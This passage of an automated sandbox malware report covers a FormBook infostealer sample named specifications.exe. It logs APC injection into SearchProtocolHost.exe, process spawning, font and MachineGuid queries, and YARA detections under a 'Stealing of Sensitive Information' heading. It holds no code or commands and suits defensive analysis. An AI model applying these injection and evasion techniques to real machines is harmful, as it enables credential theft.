                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread APC queued: target process: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeProcess created: C:\Users\user\Desktop\specifications.exe "C:\Users\user\Desktop\specifications.exe"Jump to behavior
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: neghZqrDWkxUmu.exe, 00000006.00000000.1966182889.0000000001840000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000006.00000002.4145112552.0000000001841000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145319558.0000000001111000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: neghZqrDWkxUmu.exe, 00000006.00000000.1966182889.0000000001840000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000006.00000002.4145112552.0000000001841000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145319558.0000000001111000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: neghZqrDWkxUmu.exe, 00000006.00000000.1966182889.0000000001840000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000006.00000002.4145112552.0000000001841000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145319558.0000000001111000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: neghZqrDWkxUmu.exe, 00000006.00000000.1966182889.0000000001840000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000006.00000002.4145112552.0000000001841000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145319558.0000000001111000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Users\user\Desktop\specifications.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 2.2.specifications.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.specifications.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.4145588034.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2048253746.00000000034F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4145624190.00000000008E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2041857400.00000000013E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
